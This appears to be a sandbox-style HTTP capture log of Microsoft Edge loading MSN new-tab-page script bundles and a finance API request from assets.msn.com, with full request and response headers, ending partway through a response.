GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/cold-start-wc.bb5af50faf8792f370ad.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/cold-start-wc.bb5af50faf8792f370ad.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 2EzPXXSEQsc77q1q0EDRIg==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF556E15B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2fe7b60f-a01e-00f6-065b-1452c1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:15 GMT
akamai-request-bc: [a=88.221.24.111,b=431574548,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b94e14
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/experiences_weather-card-wc_dist_components_weather-hide-remind_index_js.88b7d28d697039071577.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/experiences_weather-card-wc_dist_components_weather-hide-remind_index_js.88b7d28d697039071577.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: jxryjFiCYMROYEXVhYOYyw==
last-modified: Fri, 16 Dec 2022 21:57:08 GMT
etag: 0x8DADFB07A792A8A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a7a0251a-701e-005b-0c14-134bbc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:16 GMT
akamai-request-bc: [a=88.221.24.111,b=431575584,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=30, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b95220
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/experiences_welcome-greeting-wc_dist_components_finance-greeting_index_js.d0193a33a56cae62b9b7.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/experiences_welcome-greeting-wc_dist_components_finance-greeting_index_js.d0193a33a56cae62b9b7.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: bLQ1Q8vq5dFcqYoHAbCgRA==
last-modified: Tue, 20 Dec 2022 23:56:02 GMT
etag: 0x8DAE2E5C04F3994
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8293f497-101e-005d-5962-16b1b0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:16 GMT
akamai-request-bc: [a=88.221.24.111,b=431575597,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=30, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9522d
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/sticky-peek.c9cf795ac2b6fbe646cd.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/sticky-peek.c9cf795ac2b6fbe646cd.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: nVKeZ7KZzRkXyhm3PaShAQ==
last-modified: Fri, 16 Dec 2022 21:57:07 GMT
etag: 0x8DADFB079B55AF4
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f07509fe-601e-00ea-4fff-1316fa000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:16 GMT
akamai-request-bc: [a=88.221.24.111,b=431575700,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=24, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b95294
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/experiences_weather-card-wc_dist_components_weather-report-issue_index_js.b7dc292fe6ab9ad01e05.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/experiences_weather-card-wc_dist_components_weather-report-issue_index_js.b7dc292fe6ab9ad01e05.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: G/DgGiMe/Cfo9PCUdUGTGQ==
last-modified: Tue, 20 Dec 2022 05:42:22 GMT
etag: 0x8DAE24CF7779CD7
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3b6f6e6c-901e-0079-535a-148c8b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:16 GMT
akamai-request-bc: [a=88.221.24.111,b=431575706,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=24, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9529a
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/libs_weather-shared-wc_dist_index_js.14c631405f471e01d5ab.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/libs_weather-shared-wc_dist_index_js.14c631405f471e01d5ab.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: xTtovkCyDH23UX7AXgj5IQ==
last-modified: Tue, 20 Dec 2022 23:56:04 GMT
etag: 0x8DAE2E5C18716B7
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f6070e8b-201e-00fe-7f63-160ad0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:16 GMT
akamai-request-bc: [a=88.221.24.111,b=431575818,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=26, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9530a
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/company-news-card.f07d7f0f5007f0ac8ffc.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/company-news-card.f07d7f0f5007f0ac8ffc.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: GfkOaCyRU16Bvhw54rOHYw==
last-modified: Tue, 20 Dec 2022 05:42:21 GMT
etag: 0x8DAE24CF702F31E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d7e0c3b0-201e-0096-155c-1410e3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:16 GMT
akamai-request-bc: [a=88.221.24.111,b=431576031,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=22, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b953df
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/content-group-card.33b3e6a94fad66e0d0d2.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/content-group-card.33b3e6a94fad66e0d0d2.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 6Twf6DQEXQC99vOQXKzy7g==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF5488B99
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2fe7b6ed-a01e-00f6-4c5b-1452c1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:16 GMT
akamai-request-bc: [a=88.221.24.111,b=431576285,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b954dd
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/daily-discovery.ae9ec9af044c04c26717.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/daily-discovery.ae9ec9af044c04c26717.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: xNClpTHeBP74i7QoHqy+1w==
last-modified: Fri, 16 Dec 2022 21:57:09 GMT
etag: 0x8DADFB07B215FD5
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6ffef365-301e-004f-3bd2-135796000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:16 GMT
akamai-request-bc: [a=88.221.24.111,b=431576406,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b95556
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/default-browser-reclaim-banner.ab76bc3eca2337852256.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/default-browser-reclaim-banner.ab76bc3eca2337852256.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 9ttFiggj2fweMo9LlEujuw==
last-modified: Tue, 20 Dec 2022 05:42:23 GMT
etag: 0x8DAE24CF7E9FCFE
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: aab6b201-601e-00fa-505c-14a6d8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:17 GMT
akamai-request-bc: [a=88.221.24.111,b=431576515,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b955c3
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/DefaultBrowserReclaimData.8abfe95ed5d89b77eb4c.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/DefaultBrowserReclaimData.8abfe95ed5d89b77eb4c.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: NR6XYmO4W1tDoXWj+z+niQ==
last-modified: Tue, 20 Dec 2022 05:42:21 GMT
etag: 0x8DAE24CF740B666
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ab900175-401e-00c4-715a-1425d4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:17 GMT
akamai-request-bc: [a=88.221.24.111,b=431576693,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=23, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b95675
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/libs_finance-service-library_dist_index_js.8409bd17de173fd1a321.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/libs_finance-service-library_dist_index_js.8409bd17de173fd1a321.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: Bzp0xu+Wg1vfPHKHZgiaog==
last-modified: Fri, 16 Dec 2022 21:57:08 GMT
etag: 0x8DADFB07A163179
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5a98c24c-701e-0077-3200-142e96000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:17 GMT
akamai-request-bc: [a=88.221.24.111,b=431576802,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=27, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b956e2
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/dev-tools.f74ce40844294f403d22.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/dev-tools.f74ce40844294f403d22.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: M0LlRegyGaM6UbV+54nTuA==
last-modified: Tue, 20 Dec 2022 05:42:20 GMT
etag: 0x8DAE24CF63EFC7C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3b6f7a54-901e-0079-395a-148c8b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:17 GMT
akamai-request-bc: [a=88.221.24.111,b=431576857,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=22, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b95719
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/service/Finance/Exchanges?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=BBDF58A6-1710-44BE-A527-DB44C4CAFD8D&ocid=anaheim-ntp-Peregrine&cm=nl-nl&ids=r6dwnt&wrapodata=falsemsedge.exeRemote address:88.221.24.115:443RequestGET /service/Finance/Exchanges?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=BBDF58A6-1710-44BE-A527-DB44C4CAFD8D&ocid=anaheim-ntp-Peregrine&cm=nl-nl&ids=r6dwnt&wrapodata=false HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-encoding: gzip
access-control-allow-headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType
access-control-expose-headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType
ddd-usertype: Unknown
x-fd-detection-corpnet: 0
ddd-activityid: c0207e54-1243-4bff-9d64-1479f6e7f0b6
ddd-debugid: c0207e54-1243-4bff-9d64-1479f6e7f0b6|2022-12-31T00:05:46.7191684Z|fabric:/finance|NEU1|Finance_26
onewebservicelatency: 2
x-msedge-responseinfo: 2
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 512F49E698A64037A3645925499953CE Ref B: AMS04EDGE2915 Ref C: 2022-12-31T00:05:46Z
content-length: 1611
date: Sat, 31 Dec 2022 00:06:17 GMT
akamai-request-bc: [a=88.221.24.111,b=431576878,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=22, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9572e
access-control-allow-methods: PUT,PATCH,POST,GET,OPTIONS,DELETE
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
x-as-suppresssetcookie: 1
cache-control: public, max-age=60
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/money-info-card-wc.4de7fd7c76c8c155065d.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/money-info-card-wc.4de7fd7c76c8c155065d.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: zQGizM1RV9NjhQaaJQVklQ==
last-modified: Fri, 16 Dec 2022 21:57:03 GMT
etag: 0x8DADFB07790F67E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 45868b85-601e-00ae-470c-1469e3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
